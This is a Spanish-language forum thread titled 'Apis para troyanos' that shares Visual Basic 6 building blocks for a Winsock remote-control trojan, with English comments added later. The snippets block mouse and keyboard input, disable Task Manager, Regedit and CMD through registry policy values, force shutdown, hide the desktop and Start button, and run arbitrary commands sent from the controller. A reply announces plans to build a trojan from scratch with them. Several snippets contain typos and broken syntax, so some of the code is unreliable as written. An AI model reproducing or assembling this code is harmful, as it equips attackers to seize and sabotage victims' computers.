
Título: Apis para troyanos
Publicado por: ANTRAX en Febrero 23, 2010, 10:06:46 AM
' Win32 import: ShowCursor from user32. The Win32 API uses the argument to raise or
' lower the cursor display counter; the DataArrival handler further down this page
' calls it with False to hide the pointer.
Declare Function ShowCursor Lib "user32" _
(ByVal bShow As Long) As Long


En el SERVER, en la sección de Data arrival:
Código:

' DataArrival handler on the remotely controlled ("server") side.
' Reads the received payload from ws (presumably a Winsock control - confirm) into a
' string and, when it equals "desp", calls ShowCursor with False.
' NOTE(review): the only check is the string compare. Nothing in this handler
' authenticates the peer, so any host that can reach the socket can trigger the action.
Private Sub ws_DataArrival(ByVal bytesTotal As Long)
Dim datos As String
ws.GetData datos
if datos = "desp" then ShowCursor false
end sub



Y en el command button del cliente


Código:

' Controller-side ("cliente") button handler: sends the fixed command string "desp"
' over ws. The command travels as a plain literal, so it is visible to network
' inspection on the path.
Private Sub Command1_Click()
ws.senddata "desp"
End Sub


Y cuando ustedes presionen el botón de desaparecer el mouse, el cliente enviará los datos al server y este mismo los ejecutará!!!


Bueno aqui les dejo otros codes para que los implementeis!!!



Código:

-----------------------blokear mouse i teclado----------------------
agregar un commandbutton en el cliente i un modulo en el server
-----en el modulo del server------

' Win32 import: BlockInput from user32, which blocks or unblocks keyboard and mouse
' input events for the desktop.
' Triage note: ordinary desktop software rarely imports this function, so finding it in
' an import table or API trace is a reason to look closer (some remote-support and
' automation tools do use it legitimately).
Public Declare Function BlockInput Lib "user32" _
(ByVal fBlock As Long) As Long

-----en el server------

' DataArrival handler: when the received payload equals "desa", calls BlockInput with
' True, which blocks keyboard and mouse input.
' NOTE(review): no authentication of the sender; the string compare is the only gate.
' Responder note: per the Win32 documentation the block ends when the blocking thread
' exits, and Ctrl+Alt+Del also restores input - confirm on the affected OS version.
Private Sub ws_DataArrival(ByVal bytesTotal As Long)
Dim datos As String
ws.GetData datos
if datos = "desa" then BlockInput true
end sub

-----en el cliente---

Private Sub Command1_Click()
ws.senddata "desa"
End Sub





Código:

---------------------------------------hacer sonar beep ----------------

agregar un commandbutton en el cliente i un modulo en el server
-----en el modulo del server------

Public Declare Function Beep Lib "kernel32" (ByVal dwFreq As Long, ByVal dwDuration As Long) As Long

------en el server---------

' DataArrival handler: when the received payload equals "beep", calls Beep twice.
' Both arguments are 999; the Declare on this page names them dwFreq and dwDuration.
' Nuisance action only: nothing is written to disk or to the registry here.
Private Sub ws_DataArrival(ByVal bytesTotal As Long)
Dim datos As String
ws.GetData datos
if datos = "beep" then
Beep 999, 999
Beep 999, 999
end if
end sub

----en el cliente-----
Private Sub Command1_Click()
ws.senddata "beep"
End Sub




Código:

-----------------------------------------abrir cosita de los cd---------------------------

agregar un modulo en el server i un commandbutton en el cliente

-----en el modulo del server---
' Win32 import: mciSendStringA from winmm.dll (the ANSI entry point, aliased here as
' mciSendString), which sends a textual command to a Media Control Interface device.
Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal _
lpstrReturnString As String, ByVal uReturnLength As Long, _
ByVal hwndCallback As Long) As Long

----en el server---

' DataArrival handler: when the received payload equals "trok", sends the MCI command
' "Set CDAudio Door Open" through mciSendString.
' ReturnString is a fixed-length 127-character buffer for the MCI reply. The status
' code is stored in Res, but nothing in this handler reads it afterwards.
Private Sub ws_DataArrival(ByVal bytesTotal As Long)
Dim datos As String
ws.GetData datos
if datos = "trok" then
Dim Res As Long, ReturnString As String * 127
Res = mciSendString("Set CDAudio Door Open", ReturnString, 127, 0)
end if
end sub

---en el cliente----

Private Sub Command1_Click()
ws.senddata "trok"
End Sub



Código:

-------------------------blokear el taskmgr.exe(cttrl + alt +supr)-------------------------

agregar 1 comand button en el server i 1 en el cliente

----en el server-----

' Calls CreateIntegerKey to write "1" to the per-user DisableTaskmgr policy value.
' Defender note: the target is under HKEY_CURRENT_USER, so the write needs no elevation
' and affects the logged-on user only. A DisableTaskmgr value set by anything other than
' policy tooling is a well-known tamper indicator (MITRE ATT&CK T1112 / T1562.001).
' Registry value-set auditing on the Policies\System key (for example Sysmon event ID 13)
' records both the write and the writing process.
Private Sub Command1_Click()
CreateIntegerKey "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\System\DisableTaskmgr", "1"
End Sub

' Writes a value to the registry as REG_DWORD through the WScript.Shell COM object.
'   Folder - full registry path of the value to write (hive, key and value name)
'   Value  - data to store
' Runtime errors jump to the "men" label, which shows Err.Description in a message box
' and then resumes with the next statement.
' Despite its name, Fso holds a WScript.Shell object, not a FileSystemObject.
Private Sub CreateIntegerKey(Folder As String, Value As Integer)
Dim Fso As Object
On Error GoTo men

Set Fso = CreateObject("wscript.shell"

Fso.RegWrite Folder, Value, "REG_DWORD"


Set Fso = Nothing


Exit Sub
'error
men:
MsgBox Err.Description: Resume Next
End Sub

' DataArrival handler: compares the received payload with "trtk" and, on a match, calls
' Command1_Click, the local routine that writes the DisableTaskmgr policy value.
' NOTE(review): no authentication of the sender; the string compare is the only gate.
rivate Sub ws_DataArrival(ByVal bytesTotal As Long)
Dim datos As String
ws.GetData datos
if datos = "trtk" then call Command1_Click
end sub

----en el cliente----
Private Sub Command1_Click()
ws.senddata " trtk"
end sub



Código:

----------------------------------------apagar el pc------------------

agregar un commandbutton en el cliente
----en el server---
' DataArrival handler: when the received payload equals "lol", launches the shutdown
' command with the arguments "-s -t 00" via Shell.
' The command name is held in sn and concatenated with the arguments at run time, so
' the full command line does not appear as a single literal in this code.
' Defender note: process-creation logging with command lines (Security event 4688 or
' Sysmon event ID 1) shows shutdown being started by an unexpected parent process
' (MITRE ATT&CK T1529).
Private Sub ws_DataArrival(ByVal bytesTotal As Long)

Dim datos As String
Dim sn As String
sn = "shutdown"
ws.GetData datos
If datos = "lol" Then Shell (sn & " -s -t 00"
----en el cliente----
Private Sub Command1_Click()
ws.senddata "lol"
End Sub



Código:

---------------------ejecutar un archivo----------------

agregar un textbox en el cliente i un comandbutton en el cliente

----en el server----

' DataArrival handler: when the received payload starts with "ejec", strips that
' four-character prefix and passes the remainder unchanged to Shell.
' NOTE(review): this is unauthenticated remote command execution. The text after the
' prefix is neither validated nor checked against an allow-list, and it runs with the
' privileges of the hosting process.
' Defender note: look for a process that both holds a network socket and starts
' arbitrary child processes; process-creation logging (Security event 4688 or Sysmon
' event ID 1) captures the parent/child pair and the command line.
Private Sub ws_DataArrival(ByVal bytesTotal As Long)
Dim datos As String
ws.GetData datos
If Left(datos, 4) = "ejec" Then
datos = Right(datos, Len(datos) - 4)
Shell (datos)
End If
end sub

---en el cliente---

Private Sub Form_Load()
text1.text = "aka va el archivo a ejecutar"
End Sub
' Controller-side button handler: sends "ejec" followed by the contents of text1 over ws.
' Prefix and operator-supplied text travel as one plain string, visible to network
' inspection on the path.
Private Sub Command1_Click()
ws.senddata "ejec" & text1.text
End Sub




Código:

-----------------------------------no dejar abrir ventanas-----------------------------------

agrega un modulo i un timer en el server i un commandbutton en el kliente

----en el modulo del server---

' VK_LWIN: virtual-key code of the left Windows key.
Public Const VK_LWIN = &H5B
' KEYEVENTF_KEYUP: keybd_event flag marking the event as a key release.
Public Const KEYEVENTF_KEYUP = &H2

' Win32 import: keybd_event from user32, which synthesizes a keystroke as if it came from
' the keyboard.
Public Declare Sub keybd_event Lib "user32" _
(ByVal bVk As Byte, ByVal bScan As Byte, _
ByVal dwFlags As Long, ByVal dwExtraInfo As Long)

----en el server----

Private Sub Form_Load()
timer1.enabled = false
End Sub
' Timer tick: synthesizes a left-Windows-key press, a press of virtual key 77 (the "M"
' key) and a left-Windows-key release. Win+M is the shell shortcut that minimizes all
' windows, so each tick collapses whatever the user has open.
' The code sends no key-up event for key 77.
Private Sub Timer1_Timer()
Call keybd_event(VK_LWIN, 0, 0, 0)
Call keybd_event(77, 0, 0, 0)
Call keybd_event(VK_LWIN, 0, KEYEVENTF_KEYUP, 0)
End Sub
' DataArrival handler: when the received payload equals "jajaja", sets timer1's interval
' to 100 (milliseconds for a VB Timer control) and enables it, which starts the
' repeating Timer1_Timer callback.
' NOTE(review): no command in this snippet disables the timer again, so the effect lasts
' until the process ends. Sender is not authenticated.
Private Sub ws_DataArrival(ByVal bytesTotal As Long)
Dim datos As String
ws.GetData datos
if datos = "jajaja" then
timer1.interval = 100
timer1.enabled = true
end sub

--en el cliente----
Private Sub Command1_Click()
ws.senddata "jajaja"
End Sub


Código:

------------------------despareser iconos------------------

agregar un commandbutton en el cliente

-----en el server---

Private Declare Function FindWindowEx Lib "user32" _
Alias "FindWindowExA" (ByVal hWnd1 As Long, _
ByVal hWnd2 As Long, ByVal lpsz1 As String, _
ByVal lpsz2 As String) As Long


Private Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, _
ByVal nCmdShow As Long) As Long

Const SW_SHOW = 5
Const SW_HIDE = 0



' DataArrival handler: when the received payload equals "topo", looks up the top-level
' window of class "Progman" (the shell window that hosts the desktop icons) and hides it
' with ShowWindow and SW_HIDE.
' On Error Resume Next suppresses runtime errors. The FindWindowEx result is not checked
' before use.
' Responder note: the window is only hidden, not destroyed. Restarting the shell
' (explorer.exe) normally brings the desktop back - confirm on the affected system.
private Sub ws_DataArrival(ByVal bytesTotal As Long)
Dim datos As String
ws.GetData datos
if datos = "topo" then
Dim Ret As Long

On Error Resume Next

Ret = FindWindowEx(0&, 0&, "Progman", vbNullString)

ShowWindow Ret, SW_HIDE
end if
End Sub

------en el cliente -----

Private Sub Command1_Click()
ws.senddata "topo"
end sub




Código:

---------------------desaparecer boton de inicio (signo de windows)-----------------

agregar un command button en el cliente

--------------------en el server---------
Const WS_CHILD = &H40000000
Const WM_LBUTTONDOWN = &H201
Const WM_LBUTTONUP = &H202
Const SW_HIDE = 0
Const SW_NORMAL = 1


Private Type RECT
Left As Long
Top As Long
Right As Long
Bottom As Long
End Type


Private Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long
Private Declare Function GetWindowRect Lib "user32" (ByVal hwnd As Long, lpRect As RECT) As Long
Private Declare Function CreateWindowEx Lib "user32" Alias "CreateWindowExA" (ByVal dwExStyle As Long, ByVal lpClassName As String, ByVal lpWindowName As String, ByVal dwStyle As Long, ByVal x As Long, ByVal y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hWndParent As Long, ByValhMenu As Long, ByVal hInstance As Long, lpParam As Any) As Long
Private Declare Function DestroyWindow Lib "user32" (ByVal hwnd As Long) As Long

Dim tWnd As Long, bWnd As Long, ncWnd As Long

' DataArrival handler: when the received payload equals "paza", finds the taskbar
' window (class "Shell_TrayWnd") and its child of class "BUTTON", then hides that child
' with ShowWindow and SW_HIDE. The child is presumably the Start button on the Windows
' versions this was written for - confirm.
' GetWindowRect fills R, but R is not used afterwards in this snippet.
' ncWnd is never assigned in the visible code, so the SW_NORMAL call gets a zero handle.
Private Sub ws_DataArrival(ByVal bytesTotal As Long)
Dim datos As String
ws.GetData datos
if datos = "paza" then
Dim R As RECT

tWnd = FindWindow("Shell_TrayWnd", vbNullString)
bWnd = FindWindowEx(tWnd, ByVal 0&, "BUTTON", vbNullString)

GetWindowRect bWnd, R

ShowWindow ncWnd, SW_NORMAL

ShowWindow bWnd, SW_HIDE
end if

----------en el cliente-------------

Private Sub Command1_Click()
ws.senddata "paza"
End Sub




Código:

-----------------------deabilitar el regedit------------------

agregar un command button en el cliente

-----------en el server------------------

' Writes a value to the registry as REG_DWORD through the WScript.Shell COM object.
'   Folder - full registry path of the value to write (hive, key and value name)
'   Value  - data to store
' This copy has no error handler, so a failed write raises a runtime error in the caller.
Private Sub CreateIntegerKey(Folder As String, Value As Integer)
Dim xdf As Object
Set xdf = CreateObject("wscript.shell"
xdf.RegWrite Folder, Value, "REG_DWORD"
Set Fxdf = Nothing
Exit Sub
End Sub
' DataArrival handler: when the received payload equals "regeditc", calls
' CreateIntegerKey to write "1" to the per-user DisableRegistryTools policy value.
' Defender note: this policy blocks the interactive registry editor for the user, which
' hampers manual inspection during a response. A DisableRegistryTools value set by
' anything other than policy tooling is a tamper indicator (MITRE ATT&CK T1112 /
' T1562.001); registry value-set auditing (for example Sysmon event ID 13) records it.
Private Sub ws_DataArrival(ByVal bytesTotal As Long)
Dim datos As String
ws.GetData datos
if datos = "regeditc" then
CreateIntegerKey "HKEY_CURRENT_USER\software\microsoft\windows\curr entversion\policies\system\DisableRegistryTools", "1"
end if
end sub

----------en el cliente----------

Private Sub Command1_Click()
ws.senddata = "regeditc"
End Sub



Código:

---------desabilitar el cmd (trae problemas con algunos codes que ocupan el cmd)----

agregar un commandbutton en el cliente

-----en el server-----

' Writes a value to the registry as REG_DWORD through the WScript.Shell COM object.
'   Folder - full registry path of the value to write (hive, key and value name)
'   Value  - data to store
' Despite its name, Fso holds a WScript.Shell object, not a FileSystemObject.
' There is no error handler in this copy.
Private Sub CreateIntegerKey(Folder As String, Value As Integer)
Dim Fso As Object
Set Fso = CreateObject("wscript.shell"
Fso.RegWrite Folder, Value, "REG_DWORD"
Set Fso = Nothing
Exit Sub
End Sub
' DataArrival handler: when the received payload equals "cmdc", calls CreateIntegerKey
' to write "1" to the per-user DisableCMD policy value.
' Defender note: the DisableCMD policy stops the user from opening the command
' interpreter interactively. A process outside policy tooling setting it under
' HKEY_CURRENT_USER is worth alerting on (MITRE ATT&CK T1112); registry value-set
' auditing (for example Sysmon event ID 13) identifies the writing process.
Private Sub ws_DataArrival(ByVal bytesTotal As Long)
Dim datos As String
ws.GetData datos
if datos = "cmdc" then
CreateIntegerKey "HKEY_CURRENT_USER\Software\Policies\Microsoft\Win dows\System\DisableCMD", "1"
end if
end sub

----en el cliente----

Private Sub Command1_Click()
ws.senddata = "cmdc"
End Sub
-------activar cmd--------------

agregar un commandbutton en el cliente

-----en el server-----

Private Sub CreateIntegerKey(Folder As String, Value As Integer)
Dim Fso As Object
Set Fso = CreateObject("wscript.shell"
Fso.RegWrite Folder, Value, "REG_DWORD"
Set Fso = Nothing
Exit Sub
End Sub
' DataArrival handler: when the received payload equals "cmdb", calls CreateIntegerKey
' to write "0" to the per-user DisableCMD policy value, the reverse of the "cmdc" command.
' Forensic note: a value that is set and later cleared still leaves two registry
' value-set events, so the toggle can be reconstructed from audit logs even when the
' final state looks normal.
Private Sub ws_DataArrival(ByVal bytesTotal As Long)
Dim datos As String
ws.GetData datos
if datos = "cmdb" then
CreateIntegerKey "HKEY_CURRENT_USER\Software\Policies\Microsoft\Win dows\System\DisableCMD", "0"
end if
end sub
----en el cliente----
Private Sub Command1_Click()
ws.senddata = "cmdb"
End Sub




Código:

----------activar regedit------

agregar un command button en el cliente

-----------en el server------------------

Private Sub CreateIntegerKey(Folder As String, Value As Integer)
Dim xdf As Object
Set xdf = CreateObject("wscript.shell"
xdf.RegWrite Folder, Value, "REG_DWORD"
Set Fxdf = Nothing
Exit Sub
End Sub
' DataArrival handler: when the received payload equals "regedito", calls
' CreateIntegerKey to write "0" to the per-user DisableRegistryTools policy value, the
' reverse of the "regeditc" command.
' NOTE(review): as with the other handlers, the sender is not authenticated; the string
' compare is the only gate.
Private Sub ws_DataArrival(ByVal bytesTotal As Long)
Dim datos As String
ws.GetData datos
if datos = "regedito" then
CreateIntegerKey "HKEY_CURRENT_USER\software\microsoft\windows\curr entversion\policies\system\DisableRegistryTools", "0"
end if
end sub

----------en el cliente----------

Private Sub Command1_Click()
ws.senddata = "regedito"
End Sub
-----activar taskmgr.exe-----
agregar 1 comand button en el server i 1 en el cliente
----en el server-----
Private Sub Command1_Click()
CreateIntegerKey "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\System\DisableTaskmgr", "0"
End Sub

Private Sub CreateIntegerKey(Folder As String, Value As Integer)
Dim Fso As Object
On Error GoTo men

Set Fso = CreateObject("wscript.shell"

Fso.RegWrite Folder, Value, "REG_DWORD"


Set Fso = Nothing


Exit Sub
'error
men:
MsgBox Err.Description: Resume Next
End Sub

rivate Sub ws_DataArrival(ByVal bytesTotal As Long)
Dim datos As String
ws.GetData datos
if datos = "trtj" then call Command1_Click
end sub

----en el cliente----

Private Sub Command1_Click()
ws.senddata " trtj"
end sub
Título: Re:Apis para troyanos
Publicado por: 0A10 en Abril 27, 2010, 05:08:24 PM
Perfecto, voy a crear un troyano desde 0 con Visual Basic y me vienen perfectos :)